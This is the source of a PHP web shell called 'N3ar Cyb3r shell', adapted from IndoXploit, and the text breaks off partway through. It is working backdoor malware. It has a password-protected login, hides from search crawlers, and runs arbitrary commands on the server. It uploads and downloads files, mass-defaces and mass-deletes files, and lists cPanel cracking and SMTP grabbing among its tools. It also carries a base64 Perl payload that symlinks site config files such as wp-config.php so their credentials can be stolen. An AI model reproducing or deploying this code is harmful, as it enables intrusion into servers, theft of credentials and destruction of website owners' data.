N3ar cyb3r shell

1. <?php
2. session_start();
3. error_reporting(0);
4. set_time_limit(0);
5. @set_magic_quotes_runtime(0);
6. @clearstatcache();
7. @ini_set('error_log',NULL);
8. @ini_set('log_errors',0);
9. @ini_set('max_execution_time',0);
10. @ini_set('output_buffering',0);
11. @ini_set('display_errors', 0);
12.  
13. $auth_pass = "e3da604a11c39f75d94492a36a1126c7"; // pass: N3arCyb3r-ext
14. $color = "#00ff00";
15. $default_action = 'FilesMan';
16. $default_use_ajax = true;
17. $default_charset = 'UTF-8';
18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
21. header('HTTP/1.0 404 Not Found');
22. exit;
23. }
24. }
25.  
26. function login_shell() {
27. ?>
28. <html>
29. <head>
30. <title>N3ar Cyb3r Shell</title>
31. <link rel="SHORTCUT ICON" href="http://i48.servimg.com/u/f48/16/08/07/74/indone10.gif"><head><style>
32. <style type="text/css">
33. body{cursor:url("http:///foro.elhacker.net/elhacker.cur"),auto;}html{display:table;height:100%;width:100%;}body{display:table-row;}body{display:table-cell;vertical-align:middle;text-align:center;}a:link{text-decoration:none;}
34. body {
35. background-color: #000000;
36. background-image: url(https://i.ytimg.com/vi/it81ywqc0WM/maxresdefault.jpg);
37. background-position:center;
38. background-repeat:no-repeat;
39. background-size:100% 117%;
40. background-attachment: fixed ;
41.  
42. }
43. input[type=password]
44. {
45. width: 30px;
46. height: 10px;
47. background: transparent;
48. color: white;
49. border: none;
50. }
51.  
52. </style>
53. </head>
54. <body>
55. <center>
56. <header>
57. <form method="post">
58. <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
59. <title>N3ar Cyb3r Shell</title>
60. <html>
61. </html>
62. <font style="color:#fff;text-shadow:0px 1px 5px #000;font-size:45px" face="Iceland">
63. <font style="color:#fff;text-shadow:0px 1px 5px #000;font-size:45px" face="Iceland"><a href="" target="_blank" style="color: red"></a></font><font color="red"><font color="white"></font>
64.  
65. <center><head><body><H2><br>
66. <SCRIPT>
67.  
68. farbbibliothek = new Array();
69. farbbibliothek[0] = new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100");
70. farbbibliothek[1] = new Array("#FF0000","#FFFFFF","#FFFFFF","#FF0000");
71. farbbibliothek[2] = new Array("#FFFFFF","#FF0000","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF");
72. farbbibliothek[3] = new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040");
73. farbbibliothek[4] = new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000");
74. farbbibliothek[5] = new Array("#FF0000","#FF0000","#FF0000","#FFFFFF","#FFFFFF","#FFFFFF");
75. farbbibliothek[6] = new Array("#FF0000","#FDF5E6");
76. farben = farbbibliothek[4];
77. function farbschrift()
78. {
79. for(var i=0 ; i<Buchstabe.length; i++)
80. {
81. document.all["a"+i].style.color=farben[i];
82. }
83. farbverlauf();
84. }
85. function string2array(text)
86. {
87. Buchstabe = new Array();
88. while(farben.length<text.length)
89. {
90. farben = farben.concat(farben);
91. }
92. k=0;
93. while(k<=text.length)
94. {
95. Buchstabe[k] = text.charAt(k);
96. k++;
97. }
98. }
99. function divserzeugen()
100. {
101. for(var i=0 ; i<Buchstabe.length; i++)
102. {
103. document.write("<span id='a"+i+"' class='a"+i+"'>"+Buchstabe[i] + "</span>");
104. }
105. farbschrift();
106. }
107. var a=1;
108. function farbverlauf()
109. {
110. for(var i=0 ; i<farben.length; i++)
111. {
112. farben[i-1]=farben[i];
113. }
114. farben[farben.length-1]=farben[-1];
115. setTimeout("farbschrift()",30);
116. }
117. //
118. var farbsatz=1;
119. function farbtauscher()
120. {
121. farben = farbbibliothek[farbsatz];
122. while(farben.length<text.length)
123. {
124. farben = farben.concat(farben);
125. }
126. farbsatz=Math.floor(Math.random()*(farbbibliothek.length-0.0001));
127. }
128. setInterval("farbtauscher()",10000);
129. text ="N3ar Cyb3r Private Shell";//h
130. string2array(text);
131. divserzeugen();
132. //document.write(text);
133. </SCRIPT></H2></center>
134. <!-- Made By N3ar Cyb3r-->
135. <br><br><br><br><input type="password" name="pass">
136. </center>
137. </form>
138. </header>
139. </body>
140. <?php
141. exit;
142. }
143. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
144. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
145. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
146. else
147. login_shell();
148. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
149. @ob_clean();
150. $file = $_GET['file'];
151. header('Content-Description: File Transfer');
152. header('Content-Type: application/octet-stream');
153. header('Content-Disposition: attachment; filename="'.basename($file).'"');
154. header('Expires: 0');
155. header('Cache-Control: must-revalidate');
156. header('Pragma: public');
157. header('Content-Length: ' . filesize($file));
158. readfile($file);
159. exit;
160. }
161. ?>
162.  
163.  
164. <html>
165. <head>
166. <title>N3ar Cyb3r </title>
167. <meta name='author' content='N3ar Cyb3r'>
168. <meta charset="UTF-8">
169. <style type='text/css'>
170. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
171. html {
172. background: #000000;
173. color: #00ffff;
174. font-family: 'Ubuntu';
175. font-size: 15px;
176. width: 100%;
177. }
178. li {
179. display: inline;
180. margin: 5px;
181. padding: 5px;
182. }
183. table, th, td {
184. border-collapse:collapse;
185. font-family: Tahoma, Geneva, sans-serif;
186. background: transparent;
187. font-family: 'Ubuntu';
188. font-size: 15px;
189. }
190. .table_home, .th_home, .td_home {
191. border: 2px solid lime;
192. }
193. th {
194. padding: 10px;
195. }
196. a {
197. color: #ffffff;
198. text-decoration: none;
199. }
200. a:hover {
201. color: #DA00FF;
202. text-decoration: underline;
203. }
204. b {
205. color: #DA00FF;
206. }
207. input[type=text], input[type=password],input[type=submit] {
208. background: transparent;
209. color: #ffbb00;
210. border: 2px solid lime;
211. margin: 5px auto;
212. padding-left: 5px;
213. font-family: 'Ubuntu';
214. font-size: 15px;
215. }
216. textarea {
217. border: 2px solid lime;
218. width: 100%;
219. height: 400px;
220. padding-left: 5px;
221. margin: 15px auto;
222. resize: none;
223. background: transparent;
224. color: #ffffff;
225. font-family: 'Ubuntu';
226. font-size: 15px;
227. }
228. select {
229. width: 175px;
230. background: #000000;
231. color: lime;
232. border: 2px solid lime;
233. margin: 5px auto;
234. padding-left: 5px;
235. font-family: 'Ubuntu';
236. font-size: 15px;
237. }
238. option:hover {
239. background: blue;
240. color: #000000;
241. }
242. </style>
243. </head>
244. <?php
245. ###############################################################################
246. // Shell ini tidak sepenuhnya 100% Coding manual.
247. // Shell ini adalah hasil edit dari Shell IndoXploit.
248. // Thanks buat IndoXploit.
249. // Greets: Boys Security Army.
250. ###############################################################################
251. function w($dir,$perm) {
252. if(!is_writable($dir)) {
253. return "<font color=red>".$perm."</font>";
254. } else {
255. return "<font color=blue>".$perm."</font>";
256. }
257. }
258. function r($dir,$perm) {
259. if(!is_readable($dir)) {
260. return "<font color=red>".$perm."</font>";
261. } else {
262. return "<font color=blue>".$perm."</font>";
263. }
264. }
265. function exe($cmd) {
266. if(function_exists('system')) {
267. @ob_start();
268. @system($cmd);
269. $buff = @ob_get_contents();
270. @ob_end_clean();
271. return $buff;
272. } elseif(function_exists('exec')) {
273. @exec($cmd,$results);
274. $buff = "";
275. foreach($results as $result) {
276. $buff .= $result;
277. } return $buff;
278. } elseif(function_exists('passthru')) {
279. @ob_start();
280. @passthru($cmd);
281. $buff = @ob_get_contents();
282. @ob_end_clean();
283. return $buff;
284. } elseif(function_exists('shell_exec')) {
285. $buff = @shell_exec($cmd);
286. return $buff;
287. }
288. }
289. function perms($file){
290. $perms = fileperms($file);
291. if (($perms & 0xC000) == 0xC000) {
292. // Socket
293. $info = 's';
294. } elseif (($perms & 0xA000) == 0xA000) {
295. // Symbolic Link
296. $info = 'l';
297. } elseif (($perms & 0x8000) == 0x8000) {
298. // Regular
299. $info = '-';
300. } elseif (($perms & 0x6000) == 0x6000) {
301. // Block special
302. $info = 'b';
303. } elseif (($perms & 0x4000) == 0x4000) {
304. // Directory
305. $info = 'd';
306. } elseif (($perms & 0x2000) == 0x2000) {
307. // Character special
308. $info = 'c';
309. } elseif (($perms & 0x1000) == 0x1000) {
310. // FIFO pipe
311. $info = 'p';
312. } else {
313. // Unknown
314. $info = 'u';
315. }
316. // Owner
317. $info .= (($perms & 0x0100) ? 'r' : '-');
318. $info .= (($perms & 0x0080) ? 'w' : '-');
319. $info .= (($perms & 0x0040) ?
320. (($perms & 0x0800) ? 's' : 'x' ) :
321. (($perms & 0x0800) ? 'S' : '-'));
322. // Group
323. $info .= (($perms & 0x0020) ? 'r' : '-');
324. $info .= (($perms & 0x0010) ? 'w' : '-');
325. $info .= (($perms & 0x0008) ?
326. (($perms & 0x0400) ? 's' : 'x' ) :
327. (($perms & 0x0400) ? 'S' : '-'));
328. // World
329. $info .= (($perms & 0x0004) ? 'r' : '-');
330. $info .= (($perms & 0x0002) ? 'w' : '-');
331. $info .= (($perms & 0x0001) ?
332. (($perms & 0x0200) ? 't' : 'x' ) :
333. (($perms & 0x0200) ? 'T' : '-'));
334. return $info;
335. }
336. function hdd($s) {
337. if($s >= 1073741824)
338. return sprintf('%1.2f',$s / 1073741824 ).' GB';
339. elseif($s >= 1048576)
340. return sprintf('%1.2f',$s / 1048576 ) .' MB';
341. elseif($s >= 1024)
342. return sprintf('%1.2f',$s / 1024 ) .' KB';
343. else
344. return $s .' B';
345. }
346. function ambilKata($param, $kata1, $kata2){
347. if(strpos($param, $kata1) === FALSE) return FALSE;
348. if(strpos($param, $kata2) === FALSE) return FALSE;
349. $start = strpos($param, $kata1) + strlen($kata1);
350. $end = strpos($param, $kata2, $start);
351. $return = substr($param, $start, $end - $start);
352. return $return;
353. }
354. function getsource($url) {
355. $curl = curl_init($url);
356. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
357. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
358. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
359. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
360. $content = curl_exec($curl);
361. curl_close($curl);
362. return $content;
363. }
364. function bing($dork) {
365. $npage = 1;
366. $npages = 30000;
367. $allLinks = array();
368. $lll = array();
369. while($npage <= $npages) {
370. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
371. if($x) {
372. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
373. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
374. $npage = $npage + 10;
375. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
376. } else break;
377. }
378. $URLs = array();
379. foreach($allLinks as $url){
380. $exp = explode("/", $url);
381. $URLs[] = $exp[2];
382. }
383. $array = array_filter($URLs);
384. $array = array_unique($array);
385. $sss = count(array_unique($array));
386. foreach($array as $domain) {
387. echo $domain."\n";
388. }
389. }
390. function reverse($url) {
391. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
392. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
393. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
394. curl_setopt($ch, CURLOPT_HEADER, 0);
395. curl_setopt($ch, CURLOPT_POST, 1);
396. $resp = curl_exec($ch);
397. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
398. $array = explode(",,", $resp);
399. unset($array[0]);
400. foreach($array as $lnk) {
401. $lnk = "http://$lnk";
402. $lnk = str_replace(",", "", $lnk);
403. echo $lnk."\n";
404. ob_flush();
405. flush();
406. }
407. curl_close($ch);
408. }
409. if(get_magic_quotes_gpc()) {
410. function idx_ss($array) {
411. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
412. }
413. $_POST = idx_ss($_POST);
414. $_COOKIE = idx_ss($_COOKIE);
415. }
416.  
417. if(isset($_GET['dir'])) {
418. $dir = $_GET['dir'];
419. chdir($dir);
420. } else {
421. $dir = getcwd();
422. }
423. $kernel = php_uname();
424. $ip = gethostbyname($_SERVER['HTTP_HOST']);
425. $dir = str_replace("\\","/",$dir);
426. $scdir = explode("/", $dir);
427. $freespace = hdd(disk_free_space("/"));
428. $total = hdd(disk_total_space("/"));
429. $used = $total - $freespace;
430. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=blue>OFF</font>";
431. $ds = @ini_get("disable_functions");
432. $mysql = (function_exists('mysql_connect')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
433. $curl = (function_exists('curl_version')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
434. $wget = (exe('wget --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
435. $perl = (exe('perl --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
436. $python = (exe('python --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
437. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=blue>NONE</font>";
438. if(!function_exists('posix_getegid')) {
439. $user = @get_current_user();
440. $uid = @getmyuid();
441. $gid = @getmygid();
442. $group = "?";
443. } else {
444. $uid = @posix_getpwuid(posix_geteuid());
445. $gid = @posix_getgrgid(posix_getegid());
446. $user = $uid['name'];
447. $uid = $uid['uid'];
448. $group = $gid['name'];
449. $gid = $gid['gid'];
450. }
451. echo "<center><br><efg=eyJpIjoiYiJ9&oh=5b3d4f85a22bc7d8980bba06675c8129&oe=5A0FDC39' width='60' height='60'>&nbsp &nbsp<font size='6' color='red' face= Iceland>N3ar Cyb3r</font>&nbsp &nbsp<efg=eyJpIjoiYiJ9&oh=5b3d4f85a22bc7d8980bba06675c8129&oe=5A0FDC39' width='60' height='60'></center><br>";
452. echo "System: <font color=blue>".$kernel."</font><br>";
453. echo "User: <font color=blue>".$user."</font> (".$uid.") Group: <font color=blue>".$group."</font> (".$gid.")<br>";
454. echo "Server IP: <font color=blue>".$ip."</font> | Your IP: <font color=blue>".$_SERVER['REMOTE_ADDR']."</font><br>";
455. echo "HDD: <font color=blue>$used</font> / <font color=blue>$total</font> ( Free: <font color=blue>$freespace</font> )<br>";
456. echo "Safe Mode: $sm<br>";
457. echo "Disable Functions: $show_ds<br>";
458. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
459. echo "Current DIR: ";
460. foreach($scdir as $c_dir => $cdir) {
461. echo "<a href='?dir=";
462. for($i = 0; $i <= $c_dir; $i++) {
463. echo $scdir[$i];
464. if($i != $c_dir) {
465. echo "/";
466. }
467. }
468. echo "'>$cdir</a>/";
469. }
470. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
471. echo "<hr color='lime'>";
472. echo "<center>";
473. echo "<ul>";
474. echo "<li>= <a href='?'>Home</a> =</li>";
475. echo "<li>= <a href='?dir=$dir&do=upload'>Upload Pepes</a> =</li>";
476. echo "<li>= <a href='?dir=$dir&do=cmd'>Command</a> =</li>";
477. echo "<li>= <a href='?dir=$dir&do=mass_deface'>Pepes Rame</a> =</li>";
478. echo "<li>= <a href='?dir=$dir&do=mass_delete'>Hapus Rame</a> =</li>";
479. echo "<li>= <a href='?dir=$dir&do=config'>Config</a> =</li>";
480. echo "<li>= <a href='?dir=$dir&do=jumping'>Loncat</a> =</li>";
481. echo "<li>= <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> =</li>";
482. echo "<li>= <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> =</li>";
483. echo "<li>= <a href='?dir=$dir&do=zoneh'>Zone-H</a> =</li>";
484. echo "<li>= <a href='?dir=$dir&do=cgi'>CGI Telnet</a> =</li>";
485. echo "<li>= <a href='?dir=$dir&do=network'>Network</a> =</li>";
486. echo "<li>= <a href='?dir=$dir&do=adminer'>Adminer</a> =</li><br>";
487. echo "<li>= <a href='?dir=$dir&do=fake_root'>Fake Root</a> =</li>";
488. echo "<li>= <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> =</li>";
489. echo "<li>= <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> =</li>";
490. echo "<li>= <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Pepes</a> =</li>";
491. echo "<li>= <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Pepes V.2</a> =</li>";
492. echo "<li>= <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Pepes</a> =</li>";
493. echo "<li>= <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> =</li>";
494. echo "<li>= <a style='color: red;' href='?logout=true'>Logout</a> =</li>";
495. echo "</ul>";
496. echo "</center>";
497. echo "<hr color='lime'>";
498. if($_GET['logout'] == true) {
499. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
500. echo "<script>window.location='?';</script>";
501. } elseif($_GET['do'] == 'upload') {
502. echo "<center>";
503. if($_POST['upload']) {
504. if($_POST['tipe_upload'] == 'biasa') {
505. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
506. $act = "<font color=blue>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
507. } else {
508. $act = "<font color=red>Failed to upload file</font>";
509. }
510. } else {
511. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
512. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
513. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
514. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
515. $act = "<font color=blue>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
516. } else {
517. $act = "<font color=red>Failed to upload file</font>";
518. }
519. } else {
520. $act = "<font color=red>Failed to upload file</font>";
521. }
522. }
523. }
524. echo "Upload File Pepes:
525. <form method='post' enctype='multipart/form-data'>
526. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
527. <input type='radio' name='tipe_upload' value='home_root'>Tebas_home [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
528. <input type='file' name='ix_file'>
529. <input type='submit' value='upload' name='upload'>
530. </form>";
531. echo $act;
532. echo "</center>";
533. } elseif($_GET['do'] == 'cmd') {
534. echo "<form method='post'>
535. <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
536. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
537. </form>";
538. if($_POST['do_cmd']) {
539. echo "<pre>".exe($_POST['cmd'])."</pre>";
540. }
541. } elseif($_GET['do'] == 'mass_deface') {
542. function sabun_massal($dir,$namafile,$isi_script) {
543. if(is_writable($dir)) {
544. $dira = scandir($dir);
545. foreach($dira as $dirb) {
546. $dirc = "$dir/$dirb";
547. $lokasi = $dirc.'/'.$namafile;
548. if($dirb === '.') {
549. file_put_contents($lokasi, $isi_script);
550. } elseif($dirb === '..') {
551. file_put_contents($lokasi, $isi_script);
552. } else {
553. if(is_dir($dirc)) {
554. if(is_writable($dirc)) {
555. echo "[<font color=blue>Selesai</font>] $lokasi<br>";
556. file_put_contents($lokasi, $isi_script);
557. $idx = sabun_massal($dirc,$namafile,$isi_script);
558. }
559. }
560. }
561. }
562. }
563. }
564. function sabun_biasa($dir,$namafile,$isi_script) {
565. if(is_writable($dir)) {
566. $dira = scandir($dir);
567. foreach($dira as $dirb) {
568. $dirc = "$dir/$dirb";
569. $lokasi = $dirc.'/'.$namafile;
570. if($dirb === '.') {
571. file_put_contents($lokasi, $isi_script);
572. } elseif($dirb === '..') {
573. file_put_contents($lokasi, $isi_script);
574. } else {
575. if(is_dir($dirc)) {
576. if(is_writable($dirc)) {
577. echo "[<font color=blue>Selesai</font>] $dirb/$namafile<br>";
578. file_put_contents($lokasi, $isi_script);
579. }
580. }
581. }
582. }
583. }
584. }
585. if($_POST['start']) {
586. if($_POST['tipe_sabun'] == 'mahal') {
587. echo "<div style='margin: 5px auto; padding: 5px'>";
588. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
589. echo "</div>";
590. } elseif($_POST['tipe_sabun'] == 'murah') {
591. echo "<div style='margin: 5px auto; padding: 5px'>";
592. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
593. echo "</div>";
594. }
595. } else {
596. echo "<center>";
597. echo "<form method='post'>
598. <font style='text-decoration: underline;'>Tipe Pepes :</font><br>
599. <input type='radio' name='tipe_sabun' value='murah' checked>Sendiri &nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<input type='radio' name='tipe_sabun' value='mahal'> Rame<br>
600. <font style='text-decoration: underline;'>Folder:</font><br>
601. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
602. <font style='text-decoration: underline;'>Filename:</font><br>
603. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
604. <font style='text-decoration: underline;'>Index File:</font><br>
605. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by BSA</textarea><br>
606. <input type='submit' name='start' value='Pepes Rame' style='width: 450px;'>
607. </form></center>";
608. }
609. } elseif($_GET['do'] == 'mass_delete') {
610. function hapus_massal($dir,$namafile) {
611. if(is_writable($dir)) {
612. $dira = scandir($dir);
613. foreach($dira as $dirb) {
614. $dirc = "$dir/$dirb";
615. $lokasi = $dirc.'/'.$namafile;
616. if($dirb === '.') {
617. if(file_exists("$dir/$namafile")) {
618. unlink("$dir/$namafile");
619. }
620. } elseif($dirb === '..') {
621. if(file_exists("".dirname($dir)."/$namafile")) {
622. unlink("".dirname($dir)."/$namafile");
623. }
624. } else {
625. if(is_dir($dirc)) {
626. if(is_writable($dirc)) {
627. if(file_exists($lokasi)) {
628. echo "[<font color=blue>DELETED</font>] $lokasi<br>";
629. unlink($lokasi);
630. $idx = hapus_massal($dirc,$namafile);
631. }
632. }
633. }
634. }
635. }
636. }
637. }
638. if($_POST['start']) {
639. echo "<div style='margin: 5px auto; padding: 5px'>";
640. hapus_massal($_POST['d_dir'], $_POST['d_file']);
641. echo "</div>";
642. } else {
643. echo "<center>";
644. echo "<form method='post'>
645. <font style='text-decoration: underline;'>Folder:</font><br>
646. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
647. <font style='text-decoration: underline;'>Filename:</font><br>
648. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
649. <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
650. </form></center>";
651. }
652. } elseif($_GET['do'] == 'config') {
653. $idx = mkdir("idx_config", 0777);
654. $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
655. $htc = fopen("idx_config/.htaccess","w");
656. fwrite($htc, $isi_htc);
657. fclose($htc);
658. if(preg_match("/vhosts|vhost/", $dir)) {
659. $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
660. $vhost = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdH